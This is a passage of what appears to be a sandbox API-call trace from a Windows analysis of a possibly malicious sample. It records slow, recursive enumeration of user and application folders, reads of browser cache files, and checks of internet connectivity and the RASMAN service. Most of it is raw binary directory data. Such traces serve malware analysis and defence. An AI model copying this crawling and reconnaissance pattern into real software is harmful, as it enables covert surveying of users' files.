Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:46,315 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\YMYTYN4M\f[3].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:46,315 | 504 | NtReadFile |
Buffer => window.google.ac.h(["chrome",[["chrome",0],["chrome\u003cb\u003ecast\u003c\/b\u003e",0],["chrome\u003cb\u003ecast apps\u003c\/b\u003e",0],["chrome\u003cb\u003e store\u003c\/b\u003e",0],["chrome\u003cb\u003ebook\u003c\/b\u003e",0],["chrome\u003cb\u003e remo FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:46,315 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:46,315 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\YMYTYN4M\f[4].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:46,345 | 504 | NtReadFile |
Buffer => (function(){var f=this,h=function(a){var b=typeof a;if("object"==b)if(a){if(a instanceof Array)return"array";if(a instanceof Object)return b;var d=Object.prototype.toString.call(a);if("[object Window]"==d)return"object";if("[object Array]"==d||"number"==ty FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:46,355 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:46,355 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => \x80\x00\x00\x00\x00\x00\x00\x00p@\xd0\xee\xdf\x91\xcf\x01p@\xd0\xee\xdf\x91\xcf\x01p@\xd0\xee\xdf\x91\xcf\x01p@\xd0\xee\xdf\x91\xcf\x01+\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x18\x00P\x00R\x00I\x00M\x00E\x00D\x00~\x001\x00.\x00G\x00I\x00F\x00p\x00r\x00i\x00m\x00e\x00d\x00n\x00s\x00[\x001\x00]\x00.\x00g\x00i\x00f\x009\x00D\x00\x88\x00\x00\x00\x00\x00\x00\x00`\x87w\xf0\xdf\x91\xcf\x01`\x87w\xf0\xdf\x91\xcf\x01`\x87w\xf0\xdf\x91\xcf\x01`\x87w\xf0\xdf\x91\xcf\x01P \x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x16\x00R\x00E\x00N\x00D\x00E\x00R\x00~\x001\x00.\x00J\x00S\x00\x00\x00r\x00e\x00n\x00d\x00e\x00r\x00e\x00r\x00_\x00l\x00i\x00g\x00h\x00t\x00[\x001\x00]\x00 |
SUCCESS | 0x00000000 | |
| 07:43:46,355 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:46,355 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000174 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:46,355 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000017c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:46,355 | 504 | FindFirstFileExW |
FileName => C:\*.* |
SUCCESS | 0x00164f80 | |
| 07:43:46,355 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000017c FileInformation => x\x00\x00\x00\x00\x00\x00\x00\x80\x1e\xd7\x9b\xe4\x91\xcf\x01\x80\x1e\xd7\x9b\xe4\x91\xcf\x01P\xfdYw\xe4\x91\xcf\x01P\xfdYw\xe4\x91\xcf\x01\x1e\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00A\x00V\x00S\x00C\x00A\x00N\x00~\x001\x00.\x00I\x00N\x00I\x00A\x00V\x00S\x00c\x00a\x00n\x00n\x00e\x00r\x00.\x00i\x00n\x00i\x00p\x00\x00\x00\x00\x00\x00\x00 N\xd3\x1foI\xcd\x01P\xcduQ\xd4I\xcd\x01P\xcduQ\xd4I\xcd\x01P\xbb\x86\xe0\xd4I\xcd\x01\xd3\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\x00o\x00o\x00t\x00.\x00i\x00n\x00i\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00p\x05\xdf\xd7\xd4I\xcd\x01p\x05\xdf\xd7\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:46,355 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:46,445 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\*.* |
SUCCESS | 0x0016f390 | |
| 07:43:46,445 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000174 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\xeb\xb1/oI\xcd\x01\xc0%\xb0rX\x94\xcf\x01\xf0\xc9P\xb9\xd5I\xcd\x01\xf0\xc9P\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00\xa0r\xb3/oI\xcd\x01P\xba\x04(\xf2\x91\xcf\x01\x10\xb6\xa9\xb3\xd4I\xcd\x01\x10\xb6\xa9\xb3\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00L\x00L\x00U\x00S\x00E\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00x\x00\x00\x00\x00\x00\x00\x00\xa0r\xb3/oI\xcd\x01P\xd8S\xb9\xd5I\xcd\x01P\x8e\xfd\xb7\xd5I\xcd\x01P\x8e\xfd\xb7\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:46,445 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:46,525 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\*.* |
SUCCESS | 0x0016e590 | |
| 07:43:46,525 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0r\xb3/oI\xcd\x01P\xba\x04(\xf2\x91\xcf\x01\x10\xb6\xa9\xb3\xd4I\xcd\x01\x10\xb6\xa9\xb3\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00i\x00m\x00e\x00\x80\x00\x00\x00\x00\x00\x00\x00@\x85D2oI\xcd\x01\x80A\x06(\xf2\x91\xcf\x01\x10 %\x9c\xe4\x91\xcf\x01\x10 %\x9c\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00P\x00P\x00L\x00I\x00C\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00e\x00p\x00\x00\x00\x00\x00\x00\x00P\xac59oI\xcd\x01\xbf\xd0\xd9:\xaf\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:43:46,525 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:46,685 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\*.* |
SUCCESS | 0x0016ea30 | |
| 07:43:46,685 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\x85D2oI\xcd\x01\x80A\x06(\xf2\x91\xcf\x01\x10 %\x9c\xe4\x91\xcf\x01\x10 %\x9c\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00h\x00\x00\x00\x00\x00\x00\x000\xa4\xb57\xe4\x91\xcf\x01p\xd7Gs\xe4\x91\xcf\x01\xf0\xc0\xbb7\xe4\x91\xcf\x01\xf0\xc0\xbb7\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00d\x00o\x00b\x00e\x00x\x00\x00\x00\x00\x00\x00\x00\x80379oI\xcd\x01\xb0 \xc73\xf2\x91\xcf\x01\x80379oI\xcd\x01\x80379oI\xcd\x01>\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:43:46,685 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:46,775 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Adobe\*.* |
SUCCESS | 0x0016ea68 | |
| 07:43:46,775 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x000\xa4\xb57\xe4\x91\xcf\x01p\xd7Gs\xe4\x91\xcf\x01\xf0\xc0\xbb7\xe4\x91\xcf\x01\xf0\xc0\xbb7\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00`\xc1V\xc1\xe6\x91\xcf\x01`\xc1V\xc1\xe6\x91\xcf\x01`\xc1V\xc1\xe6\x91\xcf\x01`\xc1V\xc1\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00c\x00r\x00o\x00b\x00a\x00t\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\xc0\xbb7\xe4\x91\xcf\x01\xa0!i\xb0\xe6\x91\xcf\x01\x10\xca\x02\x9f\xe6\x91\xcf\x01\x10\xca\x02\x9f\xe6\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:43:46,775 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:46,866 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Adobe\Acrobat\*.* |
SUCCESS | 0x0016cd68 | |
| 07:43:46,866 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\xc1V\xc1\xe6\x91\xcf\x01`\xc1V\xc1\xe6\x91\xcf\x01\x90HX\xc1\xe6\x91\xcf\x01\x90HX\xc1\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"ar\x00\x00\x00\x00\x00\x00\x00\x00\x90HX\xc1\xe6\x91\xcf\x01\x90HX\xc1\xe6\x91\xcf\x01\x90HX\xc1\xe6\x91\xcf\x01\x90HX\xc1\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x001\x001\x00.\x000\x00 |
SUCCESS | 0x00000000 | |
| 07:43:46,866 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:46,886 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:46,886 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:46,886 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x0016cdc8 | |
| 07:43:46,886 | 1308 | OpenServiceW |
ServiceControlManager => 0x0016cdc8 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x0016f2b0 | |
| 07:43:46,886 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:46,896 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:46,896 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:46,946 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Adobe\Acrobat\11.0\*.* |
SUCCESS | 0x0016ce40 | |
| 07:43:46,946 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90HX\xc1\xe6\x91\xcf\x01\x90HX\xc1\xe6\x91\xcf\x01\x90HX\xc1\xe6\x91\xcf\x01\x90HX\xc1\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00Timezo\x00\x00\x00\x00\x00\x00\x00\x00\x90HX\xc1\xe6\x91\xcf\x01\x90HX\xc1\xe6\x91\xcf\x01\x90HX\xc1\xe6\x91\xcf\x01\x90HX\xc1\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x10\x00R\x00E\x00P\x00L\x00I\x00C\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00R\x00e\x00p\x00l\x00i\x00c\x00a\x00t\x00e\x00 |
SUCCESS | 0x00000000 | |
| 07:43:46,946 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:47,026 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Adobe\Acrobat\11.0\Replicate\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:47,026 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90HX\xc1\xe6\x91\xcf\x01\x90HX\xc1\xe6\x91\xcf\x01\x90HX\xc1\xe6\x91\xcf\x01\x90HX\xc1\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.\x00\x00\x00\x00\x00\x00\x00\x00\x90HX\xc1\xe6\x91\xcf\x01\x90HX\xc1\xe6\x91\xcf\x01\x90HX\xc1\xe6\x91\xcf\x01\x90HX\xc1\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x00e\x00c\x00u\x00r\x00i\x00t\x00y\x00 |
SUCCESS | 0x00000000 | |
| 07:43:47,026 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:47,106 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Adobe\Acrobat\11.0\Replicate\Security\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:47,106 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90HX\xc1\xe6\x91\xcf\x01\x90HX\xc1\xe6\x91\xcf\x01\x80\xec_\xc1\xe6\x91\xcf\x01\x80\xec_\xc1\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00i=0,r&\x00\x00\x00\x00\x00\x00\x00\x00\x00\xec\xab\xaf0\x9a\xcd\x01\x80\xec_\xc1\xe6\x91\xcf\x01\x00\xec\xab\xaf0\x9a\xcd\x01\x80\xec_\xc1\xe6\x91\xcf\x01\xdf\x01\x00\x00\x00\x00\x00\x00\xe0\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x18\x00D\x00I\x00R\x00E\x00C\x00T\x00~\x001\x00.\x00A\x00C\x00R\x00d\x00i\x00r\x00e\x00c\x00t\x00o\x00r\x00i\x00e\x00s\x00.\x00a\x00c\x00r\x00o\x00d\x00a\x00t\x00a\x00 |
SUCCESS | 0x00000000 | |
| 07:43:47,106 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:47,106 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:47,106 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:47,106 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:47,106 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:47,186 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Adobe\Setup\*.* |
SUCCESS | 0x0016cd68 | |
| 07:43:47,186 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\xc0\xbb7\xe4\x91\xcf\x01\xa0!i\xb0\xe6\x91\xcf\x01\x10\xca\x02\x9f\xe6\x91\xcf\x01\x10\xca\x02\x9f\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"ar\x00\x00\x00\x00\x00\x00\x00\x00\x10\xca\x02\x9f\xe6\x91\xcf\x01P\x0b9\xaf\xe6\x91\xcf\x01P\x0b9\xaf\xe6\x91\xcf\x01P\x0b9\xaf\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00L\x00\x00\x00\x00\x00\x00\x00\x10\x00{\x00A\x00C\x007\x006\x00B\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00{\x00A\x00C\x007\x006\x00B\x00A\x008\x006\x00-\x007\x00A\x00D\x007\x00-\x001\x000\x003\x003\x00-\x007\x00B\x004\x004\x00-\x00A\x00B\x000\x000\x00 |
SUCCESS | 0x00000000 | |
| 07:43:47,186 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:47,276 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AB0000000001}\*.* |
SUCCESS | 0x0016ce40 | |
| 07:43:47,276 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xca\x02\x9f\xe6\x91\xcf\x01P\x0b9\xaf\xe6\x91\xcf\x01P\x0b9\xaf\xe6\x91\xcf\x01P\x0b9\xaf\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00Timezop\x00\x00\x00\x00\x00\x00\x00l\x14\x99\xc9\x06\x9a\xcd\x01\xe0\x10\xa8\xaa\xe6\x91\xcf\x01l\x14\x99\xc9\x06\x9a\xcd\x01\xe0\x10\xa8\xaa\xe6\x91\xcf\x01q\x02\x00\x00\x00\x00\x00\x00x\x02\x00\x00\x00\x00\x00\x00 \x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00B\x00C\x00P\x00Y\x00.\x00I\x00N\x00I\x00x\x00\x00\x00\x00\x00\x00\x00p\x85\xeeP\x07\x9a\xcd\x01\xb0\x89\xa6\xaa\xe6\x91\xcf\x01p\x85\xeeP\x07\x9a\xcd\x01\xb0\x89\xa6\xaa\xe6\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:43:47,276 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:47,276 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:47,276 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:47,276 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:47,356 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\McAfee\*.* |
SUCCESS | 0x0016cd68 | |
| 07:43:47,356 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\xc9Cx\xe4\x91\xcf\x01\x00\xc9Cx\xe4\x91\xcf\x01\x00\xc9Cx\xe4\x91\xcf\x01\x00\xc9Cx\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc9Cx\xe4\x91\xcf\x01\x00\xc9Cx\xe4\x91\xcf\x01\x00\xc9Cx\xe4\x91\xcf\x01\x00\xc9Cx\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00M\x00C\x00L\x00O\x00G\x00S\x00 |
SUCCESS | 0x00000000 | |
| 07:43:47,356 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:47,436 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\McAfee\MCLOGS\*.* |
SUCCESS | 0x0016ce40 | |
| 07:43:47,436 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\xc9Cx\xe4\x91\xcf\x01\x00\xc9Cx\xe4\x91\xcf\x01\x00\xc9Cx\xe4\x91\xcf\x01\x00\xc9Cx\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"ar\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc9Cx\xe4\x91\xcf\x01\xb0\x0e\x0b|\xe4\x91\xcf\x01\xb0\x0e\x0b|\xe4\x91\xcf\x01\xb0\x0e\x0b|\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x10\x00P\x00A\x00R\x00T\x00N\x00E\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00P\x00a\x00r\x00t\x00n\x00e\x00r\x00C\x00u\x00s\x00t\x00o\x00m\x00 |
SUCCESS | 0x00000000 | |
| 07:43:47,436 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:47,517 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data\McAfee\MCLOGS\PartnerCustom\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:47,517 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\xc9Cx\xe4\x91\xcf\x01\xb0\x0e\x0b|\xe4\x91\xcf\x01\xb0\x0e\x0b|\xe4\x91\xcf\x01\xb0\x0e\x0b|\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00Timezo\x88\x00\x00\x00\x00\x00\x00\x00\x00\xc9Cx\xe4\x91\xcf\x010PEx\xe4\x91\xcf\x01\x00\xc9Cx\xe4\x91\xcf\x01\x00\xc9Cx\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x10\x00S\x00E\x00C\x00U\x00R\x00I\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x00e\x00c\x00u\x00r\x00i\x00t\x00y\x00S\x00c\x00a\x00n\x00_\x00R\x00e\x00l\x00e\x00a\x00s\x00e\x00\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\xb0\x0e\x0b|\xe4\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
